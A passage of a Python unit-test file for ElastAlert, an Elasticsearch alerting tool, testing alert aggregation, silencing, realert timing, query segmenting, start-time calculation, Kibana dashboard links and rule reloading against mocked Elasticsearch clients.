assert 'alert_time' in call2['filter']['range']
assert call3['query']['query_string']['query'] == 'aggregate_id:ABCD'
assert call4['query']['query_string']['query'] == 'aggregate_id:CDEF'
assert ea.writeback_es.search.call_args_list[9][1]['size'] == 1337
def test_agg_not_matchtime(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
match_time = ts_to_dt('2014-09-26T12:55:00Z')
hits = generate_hits(hits_timestamps)
ea.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.ts_now', return_value=match_time):
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert not call3['alert_sent']
assert call3['aggregate_id'] == 'ABCD'
def test_agg_cron(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
hits = generate_hits(hits_timestamps)
ea.current_es.search.return_value = hits
alerttime1 = dt_to_ts(ts_to_dt('2014-09-26T12:46:00'))
alerttime2 = dt_to_ts(ts_to_dt('2014-09-26T13:04:00'))
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.croniter.get_next') as mock_ts:
# Aggregate first two, query over full range
mock_ts.side_effect = [dt_to_unix(ts_to_dt('2014-09-26T12:46:00')), dt_to_unix(ts_to_dt('2014-09-26T13:04:00'))]
ea.rules[0]['aggregation'] = {'schedule': '*/5 * * * *'}
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == alerttime1
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert call3['alert_time'] == alerttime2
assert not call3['alert_sent']
assert 'aggregate_id' not in call3
def test_agg_no_writeback_connectivity(ea):
""" Tests that if writeback_es throws an exception, the matches will be added to 'agg_matches' and when
run again, that they will be passed again to add_aggregated_alert """
hit1, hit2, hit3 = '2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45'
hits = generate_hits([hit1, hit2, hit3])
ea.current_es.search.return_value = hits
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': hit1},
{'@timestamp': hit2},
{'@timestamp': hit3}]
ea.writeback_es.index.side_effect = elasticsearch.exceptions.ElasticsearchException('Nope')
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'find_pending_aggregate_alert', return_value=None):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['agg_matches'] == [{'@timestamp': hit1, 'num_hits': 0, 'num_matches': 3},
{'@timestamp': hit2, 'num_hits': 0, 'num_matches': 3},
{'@timestamp': hit3, 'num_hits': 0, 'num_matches': 3}]
ea.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.add_aggregated_alert = mock.Mock()
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit1, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit2, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
ea.add_aggregated_alert.assert_any_call({'@timestamp': hit3, 'num_hits': 0, 'num_matches': 3}, ea.rules[0])
def test_agg_with_aggregation_key(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:43:45']
match_time = ts_to_dt('2014-09-26T12:45:00Z')
hits = generate_hits(hits_timestamps)
ea.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.ts_now', return_value=match_time):
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
            # Hit1 and Hit3 should be aggregated together, since they have the same aggregation_key value
ea.rules[0]['type'].matches[0]['key'] = 'Key Value 1'
ea.rules[0]['type'].matches[1]['key'] = 'Key Value 2'
ea.rules[0]['type'].matches[2]['key'] = 'Key Value 1'
ea.rules[0]['aggregation_key'] = 'key'
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['key'] == 'Key Value 1'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert 'aggregation_key' in call1
assert call1['aggregation_key'] == 'Key Value 1'
assert call1['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call2['match_body']['key'] == 'Key Value 2'
assert not call2['alert_sent']
assert 'aggregate_id' not in call2
assert 'aggregation_key' in call2
assert call2['aggregation_key'] == 'Key Value 2'
assert call2['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call3['match_body']['key'] == 'Key Value 1'
assert not call3['alert_sent']
    # Call3 should have its aggregate_id set to call1's _id
# It should also have the same alert_time as call1
assert call3['aggregate_id'] == 'ABCD'
assert 'aggregation_key' in call3
assert call3['aggregation_key'] == 'Key Value 1'
assert call3['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
# First call - Find all pending alerts (only entries without agg_id)
# Second call - Find matches with agg_id == 'ABCD'
# Third call - Find matches with agg_id == 'CDEF'
ea.writeback_es.search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_source': call1},
{'_id': 'CDEF', '_source': call2}]}},
{'hits': {'hits': [{'_id': 'BCDE', '_source': call3}]}},
{'hits': {'total': 0, 'hits': []}}]
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
ea.send_pending_alerts()
# Assert that current_es was refreshed from the aggregate rules
assert mock_es.called_with(host='', port='')
assert mock_es.call_count == 2
assert_alerts(ea, [[hits_timestamps[0], hits_timestamps[2]], [hits_timestamps[1]]])
call1 = ea.writeback_es.search.call_args_list[7][1]['body']
call2 = ea.writeback_es.search.call_args_list[8][1]['body']
call3 = ea.writeback_es.search.call_args_list[9][1]['body']
call4 = ea.writeback_es.search.call_args_list[10][1]['body']
assert 'alert_time' in call2['filter']['range']
assert call3['query']['query_string']['query'] == 'aggregate_id:ABCD'
assert call4['query']['query_string']['query'] == 'aggregate_id:CDEF'
assert ea.writeback_es.search.call_args_list[9][1]['size'] == 1337
def test_silence(ea):
# Silence test rule for 4 hours
ea.args.rule = 'test_rule.yaml' # Not a real name, just has to be set
ea.args.silence = 'hours=4'
ea.silence()
# Don't alert even with a match
match = [{'@timestamp': '2014-11-17T00:00:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 0
# Mock ts_now() to +5 hours, alert on match
match = [{'@timestamp': '2014-11-17T00:00:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(hours=5)))
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_compound_query_key(ea):
ea.rules[0]['query_key'] = 'this,that,those'
ea.rules[0]['compound_query_key'] = ['this', 'that', 'those']
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP], this='abc', that=u'☃', those=4)
ea.current_es.search.return_value = hits
ea.run_query(ea.rules[0], START, END)
call_args = ea.rules[0]['type'].add_data.call_args_list[0]
assert 'this,that,those' in call_args[0][0][0]
assert call_args[0][0][0]['this,that,those'] == u'abc, ☃, 4'
def test_silence_query_key(ea):
# Silence test rule for 4 hours
ea.args.rule = 'test_rule.yaml' # Not a real name, just has to be set
ea.args.silence = 'hours=4'
ea.silence('anytest.qlo')
# Don't alert even with a match
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
ea.rules[0]['query_key'] = 'username'
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 0
# If there is a new record with a different value for the query_key, we should get an alert
match = [{'@timestamp': '2014-11-17T00:00:01', 'username': 'dpopes'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Mock ts_now() to +5 hours, alert on match
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# Converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(hours=5)))
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
def test_realert(ea):
hits = ['2014-09-26T12:35:%sZ' % (x) for x in range(60)]
matches = [{'@timestamp': x} for x in hits]
ea.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['realert'] = datetime.timedelta(seconds=50)
ea.rules[0]['type'].matches = matches
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Doesn't alert again
matches = [{'@timestamp': x} for x in hits]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.rules[0]['type'].matches = matches
assert ea.rules[0]['alert'][0].alert.call_count == 1
# mock ts_now() to past the realert time
matches = [{'@timestamp': hits[0]}]
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
with mock.patch('elastalert.elastalert.elasticsearch_client'):
# mock_ts is converted twice to add tzinfo
mock_ts.return_value = ts_to_dt(dt_to_ts(datetime.datetime.utcnow() + datetime.timedelta(minutes=10)))
ea.rules[0]['type'].matches = matches
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
def test_realert_with_query_key(ea):
ea.rules[0]['query_key'] = 'username'
ea.rules[0]['realert'] = datetime.timedelta(minutes=10)
# Alert and silence username: qlo
match = [{'@timestamp': '2014-11-17T00:00:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
    # Don't alert again for the same username
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': 'qlo'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
# Do alert with a different value
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': ''}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 2
# Alert with query_key missing
match = [{'@timestamp': '2014-11-17T00:05:00'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 3
# Still alert with a different value
match = [{'@timestamp': '2014-11-17T00:05:00', 'username': 'ghengis_khan'}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 4
def test_realert_with_nested_query_key(ea):
ea.rules[0]['query_key'] = 'user.name'
ea.rules[0]['realert'] = datetime.timedelta(minutes=10)
# Alert and silence username: qlo
match = [{'@timestamp': '2014-11-17T00:00:00', 'user': {'name': 'qlo'}}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
    # Don't alert again for the same username
match = [{'@timestamp': '2014-11-17T00:05:00', 'user': {'name': 'qlo'}}]
ea.rules[0]['type'].matches = match
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_count(ea):
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'doctype'
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
# Assert that es.count is run against every run_every timeframe between START and END
start = START
query = {
'query': {'filtered': {'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}}}
while END - start > ea.run_every:
end = start + ea.run_every
query['query']['filtered']['filter']['bool']['must'][0]['range']['@timestamp']['lte'] = dt_to_ts(end)
query['query']['filtered']['filter']['bool']['must'][0]['range']['@timestamp']['gt'] = dt_to_ts(start)
start = start + ea.run_every
ea.current_es.count.assert_any_call(body=query, doc_type='doctype', index='idx', ignore_unavailable=True)
def run_and_assert_segmented_queries(ea, start, end, segment_size):
with mock.patch.object(ea, 'run_query') as mock_run_query:
ea.run_rule(ea.rules[0], end, start)
original_end, original_start = end, start
for call_args in mock_run_query.call_args_list:
end = min(start + segment_size, original_end)
assert call_args[0][1:3] == (start, end)
start += segment_size
# Assert elastalert_status was created for the entire time range
assert ea.writeback_es.index.call_args_list[-1][1]['body']['starttime'] == dt_to_ts(original_start)
if ea.rules[0].get('aggregation_query_element'):
assert ea.writeback_es.index.call_args_list[-1][1]['body']['endtime'] == dt_to_ts(original_end - (original_end - end))
assert original_end - end < segment_size
else:
assert ea.writeback_es.index.call_args_list[-1][1]['body']['endtime'] == dt_to_ts(original_end)
def test_query_segmenting_reset_num_hits(ea):
# Tests that num_hits gets reset every time run_query is run
def assert_num_hits_reset():
assert ea.num_hits == 0
ea.num_hits += 10
with mock.patch.object(ea, 'run_query') as mock_run_query:
mock_run_query.side_effect = assert_num_hits_reset()
ea.run_rule(ea.rules[0], END, START)
assert mock_run_query.call_count > 1
def test_query_segmenting(ea):
# buffer_time segments with normal queries
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=53)
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# run_every segments with count queries
ea.rules[0]['use_count_query'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
# run_every segments with terms queries
ea.rules[0].pop('use_count_query')
ea.rules[0]['use_terms_query'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
# buffer_time segments with terms queries
ea.rules[0].pop('use_terms_query')
ea.rules[0]['aggregation_query_element'] = {'term': 'term_val'}
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=30)
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# partial segment size scenario
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=53)
run_and_assert_segmented_queries(ea, START, END, ea.rules[0]['buffer_time'])
# run every segmenting
ea.rules[0]['use_run_every_query_size'] = True
with mock.patch('elastalert.elastalert.elasticsearch_client'):
run_and_assert_segmented_queries(ea, START, END, ea.run_every)
def test_get_starttime(ea):
endtime = '2015-01-01T00:00:00Z'
mock_es = mock.Mock()
mock_es.search.return_value = {'hits': {'hits': [{'_source': {'endtime': endtime}}]}}
mock_es.info.return_value = {'version': {'number': '2.0'}}
ea.writeback_es = mock_es
# 4 days old, will return endtime
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
mock_ts.return_value = ts_to_dt('2015-01-05T00:00:00Z') # 4 days ahead of the endtime
assert ea.get_starttime(ea.rules[0]) == ts_to_dt(endtime)
# 10 days old, will return None
with mock.patch('elastalert.elastalert.ts_now') as mock_ts:
mock_ts.return_value = ts_to_dt('2015-01-11T00:00:00Z') # 10 days ahead of the endtime
assert ea.get_starttime(ea.rules[0]) is None
def test_set_starttime(ea):
# standard query, no starttime, no last run
end = ts_to_dt('2014-10-10T10:10:10')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# Standard query, no starttime, rule specific buffer_time
ea.rules[0].pop('starttime')
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=37)
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == end - datetime.timedelta(minutes=37)
ea.rules[0].pop('buffer_time')
# Standard query, no starttime, last run
ea.rules[0].pop('starttime')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = ts_to_dt('2014-10-10T00:00:00')
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 1
assert ea.rules[0]['starttime'] == ts_to_dt('2014-10-10T00:00:00')
# Standard query, no starttime, last run, assure buffer_time doesn't go past
ea.rules[0].pop('starttime')
ea.rules[0]['buffer_time'] = datetime.timedelta(weeks=1000)
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = ts_to_dt('2014-10-09T00:00:00')
        # First call sets minimum_starttime
ea.set_starttime(ea.rules[0], end)
# Second call uses buffer_time, but it goes past minimum
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == ts_to_dt('2014-10-09T00:00:00')
# Standard query, starttime
ea.rules[0].pop('buffer_time')
ea.rules[0].pop('minimum_starttime')
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 0
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# Count query, starttime, no previous endtime
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'blah'
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert mock_gs.call_count == 0
assert ea.rules[0]['starttime'] == end - ea.run_every
# Count query, with previous endtime
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == END
# buffer_time doesn't go past previous endtime
ea.rules[0].pop('use_count_query')
ea.rules[0]['previous_endtime'] = end - ea.buffer_time * 2
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == ea.rules[0]['previous_endtime']
# Make sure starttime is updated if previous_endtime isn't used
ea.rules[0]['previous_endtime'] = end - ea.buffer_time / 2
ea.rules[0]['starttime'] = ts_to_dt('2014-10-09T00:00:01')
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == end - ea.buffer_time
# scan_entire_timeframe
ea.rules[0].pop('previous_endtime')
ea.rules[0].pop('starttime')
ea.rules[0]['timeframe'] = datetime.timedelta(days=3)
ea.rules[0]['scan_entire_timeframe'] = True
with mock.patch.object(ea, 'get_starttime') as mock_gs:
mock_gs.return_value = None
ea.set_starttime(ea.rules[0], end)
assert ea.rules[0]['starttime'] == end - datetime.timedelta(days=3)
def test_kibana_dashboard(ea):
match = {'@timestamp': '2014-10-11T00:00:00'}
mock_es = mock.Mock()
ea.rules[0]['use_kibana_dashboard'] = 'my dashboard'
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es_init:
mock_es_init.return_value = mock_es
# No dashboard found
mock_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
with pytest.raises(EAException):
ea.use_kibana_link(ea.rules[0], match)
mock_call = mock_es.search.call_args_list[0][1]
assert mock_call['body'] == {'query': {'term': {'_id': 'my dashboard'}}}
# Dashboard found
mock_es.index.return_value = {'_id': 'ABCDEFG'}
mock_es.search.return_value = {'hits': {'hits': [{'_source': {'dashboard': json.dumps(dashboard_temp)}}]}}
url = ea.use_kibana_link(ea.rules[0], match)
assert 'ABCDEFG' in url
db = json.loads(mock_es.index.call_args_list[0][1]['body']['dashboard'])
assert 'anytest' in db['title']
# Query key filtering added
ea.rules[0]['query_key'] = 'foobar'
match['foobar'] = 'baz'
url = ea.use_kibana_link(ea.rules[0], match)
db = json.loads(mock_es.index.call_args_list[-1][1]['body']['dashboard'])
assert db['services']['filter']['list']['1']['field'] == 'foobar'
assert db['services']['filter']['list']['1']['query'] == '"baz"'
# Compound query key
ea.rules[0]['query_key'] = 'foo,bar'
ea.rules[0]['compound_query_key'] = ['foo', 'bar']
match['foo'] = 'cat'
match['bar'] = 'dog'
match['foo,bar'] = 'cat, dog'
url = ea.use_kibana_link(ea.rules[0], match)
db = json.loads(mock_es.index.call_args_list[-1][1]['body']['dashboard'])
found_filters = 0
for filter_id, filter_dict in db['services']['filter']['list'].items():
if (filter_dict['field'] == 'foo' and filter_dict['query'] == '"cat"') or \
(filter_dict['field'] == 'bar' and filter_dict['query'] == '"dog"'):
found_filters += 1
continue
assert found_filters == 2
def test_rule_changes(ea):
ea.rule_hashes = {'rules/rule1.yaml': 'ABC',
'rules/rule2.yaml': 'DEF'}
ea.rules = [ea.init_rule(rule, True) for rule in [{'rule_file': 'rules/rule1.yaml', 'name': 'rule1', 'filter': []},
{'rule_file': 'rules/rule2.yaml', 'name': 'rule2', 'filter': []}]]
ea.rules[1]['processed_hits'] = ['save me']
new_hashes = {'rules/rule1.yaml': 'ABC',
'rules/rule3.yaml': 'XXX',
'rules/rule2.yaml': '!@#$'}
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
mock_load.side_effect = [{'filter': [], 'name': 'rule2', 'rule_file': 'rules/rule2.yaml'},
{'filter': [], 'name': 'rule3', 'rule_file': 'rules/rule3.yaml'}]
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
# All 3 rules still exist
assert ea.rules[0]['name'] == 'rule1'
assert ea.rules[1]['name'] == 'rule2'
assert ea.rules[1]['processed_hits'] == ['save me']
assert ea.rules[2]['name'] == 'rule3'
# Assert 2 and 3 were reloaded
assert mock_load.call_count == 2
mock_load.assert_any_call('rules/rule2.yaml', ea.conf)
mock_load.assert_any_call('rules/rule3.yaml', ea.conf)
# A new rule with a conflicting name wont load
new_hashes = copy.copy(new_hashes)
new_hashes.update({'rules/rule4.yaml': 'asdf'})
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
with mock.patch.object(ea, 'send_notification_email') as mock_send:
mock_load.return_value = {'filter': [], 'name': 'rule3', 'new': 'stuff', 'rule_file': 'rules/rule4.yaml'}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
mock_send.assert_called_once_with(exception=mock.ANY, rule_file='rules/rule4.yaml')
assert len(ea.rules) == 3
assert not any(['new' in rule for rule in ea.rules])
# A new rule with is_enabled=False wont load
new_hashes = copy.copy(new_hashes)
new_hashes.update({'rules/rule4.yaml': 'asdf'})
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'is_enabled': False, 'rule_file': 'rules/rule4.yaml'}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 3
assert not any(['new' in rule for rule in ea.rules])
# An old rule which didn't load gets reloaded
new_hashes = copy.copy(new_hashes)
new_hashes['rules/rule4.yaml'] = 'qwerty'
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
mock_load.return_value = {'filter': [], 'name': 'rule4', 'new': 'stuff', 'rule_file': 'rules/rule4.yaml'}
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 4
def test_strf_index(ea):
""" Test that the get_index function properly generates indexes spanning days """
ea.rules[0]['index'] = 'logstash-%Y.%m.%d'
ea.rules[0]['use_strftime_index'] = True
# Test formatting with times
start = ts_to_dt('2015-01-02T12:34:45Z')
end = ts_to_dt('2015-01-02T16:15:14Z')
assert ea.get_index(ea.rules[0], start, end) == 'logstash-2015.01.02'
end = ts_to_dt('2015-01-03T01:02:03Z')
assert set(ea.get_index(ea.rules[0], start, end).split(',')) == set(['logstash-2015.01.02', 'logstash-2015.01.03'])
# Test formatting for wildcard
assert ea.get_index(ea.rules[0]) == 'logstash-*'
ea.rules[0]['index'] = 'logstash-%Y.%m'
assert ea.get_index(ea.rules[0]) == 'logstash-*'
ea.rules[0]['index'] = 'logstash-%Y.%m-stuff'
assert ea.get_index(ea.rules[0]) == 'logstash-*-stuff'
def test_count_keys(ea):
ea.rules[0]['timeframe'] = datetime.timedelta(minutes=60)
ea.rules[0]['top_count_keys'] = ['this', 'that']
ea.rules[0]['type'].matches = {'@timestamp': END}
ea.rules[0]['doc_type'] = 'blah'
buckets = [{'aggregations': {'filtered': {'counts': {'buckets': [{'key': 'a', 'doc_count': 10}, {'key': 'b', 'doc_count': 5}]}}}},
{'aggregations': {'filtered': {'counts': {'buckets': [{'key': 'd', 'doc_count': 10}, {'key': 'c', 'doc_count': 12}]}}}}]
ea.current_es.search.side_effect = buckets
counts = ea.get_top_counts(ea.rules[0], START, END, ['this', 'that'])
calls = ea.current_es.search.call_args_list
assert calls[0][1]['search_type'] == 'count'
assert calls[0][1]['body']['aggs']['filtered']['aggs']['counts']['terms'] == {'field': 'this', 'size': 5}
assert counts['top_events_this'] == {'a': 10, 'b': 5}
assert counts['top_events_that'] == {'d': 10, 'c': 12}
def test_exponential_realert(ea):
ea.rules[0]['exponential_realert'] = datetime.timedelta(days=1) # 1 day ~ 10 * 2**13 seconds
ea.rules[0]['realert'] = datetime.timedelta(seconds=10)
until = ts_to_dt('2015-03-24T00:00:00')
ts5s = until + datetime.timedelta(seconds=5)
ts15s = until + datetime.timedelta(seconds=15)
ts1m = until + datetime.timedelta(minutes=1)
ts5m = until + datetime.timedelta(minutes=5)
ts4h = until + datetime.timedelta(hours=4)
test_values = [(ts5s, until, 0), # Exp will increase to 1, 10*2**0 = 10s
(ts15s, until, 0), # Exp will stay at 0, 10*2**0 = 10s
(ts15s, until, 1), # Exp will increase to 2, 10*2**1 = 20s
(ts1m, until, 2), # Exp will decrease to 1, 10*2**2 = 40s
(ts1m, until, 3), # Exp will increase to 4, 10*2**3 = 1m20s
(ts5m, until, 1), # Exp will lower back to 0, 10*2**1 = 20s
(ts4h, until, 9), # Exp will lower back to 0, 10*2**9 = 1h25m
(ts4h, until, 10), # Exp will lower back to 9, 10*2**10 = 2h50m
(ts4h, until, 11)] # Exp will increase to 12, 10*2**11 = 5h
results = (1, 0, 2, 1, 4, 0, 0, 9, 12)
next_res = iter(results)
for args in test_values:
ea.silence_cache[ea.rules[0]['name']] = (args[1], args[2])
next_alert, exponent = ea.next_alert_time(ea.rules[0], ea.rules[0]['name'], args[0])
assert exponent == next(next_res)
def test_wait_until_responsive(ea):
"""Unblock as soon as ElasticSearch becomes responsive."""
# Takes a while before becoming responsive.
ea.writeback_es.indices.exists.side_effect = [
ConnectionError(), # ES is not yet responsive.
False, # index does not yet exist.
True,
]
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0, 4.0]
timeout = datetime.timedelta(seconds=3.5)
with mock.patch('time.sleep') as sleep:
ea.wait_until_responsive(timeout=timeout, clock=clock)
# Sleep as little as we can.
sleep.mock_calls == [
mock.call(1.0),
]
def test_wait_until_responsive_timeout_es_not_available(ea, capsys):
"""Bail out if ElasticSearch doesn't (quickly) become responsive."""
# Never becomes responsive :-)
ea.writeback_es.ping.return_value = False
ea.writeback_es.indices.exists.return_value = False
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0]
timeout = datetime.timedelta(seconds=2.5)
with mock.patch('time.sleep') as sleep:
with pytest.raises(SystemExit) as exc:
ea.wait_until_responsive(timeout=timeout, clock=clock)
assert exc.value.code == 1
# Ensure we get useful diagnostics.
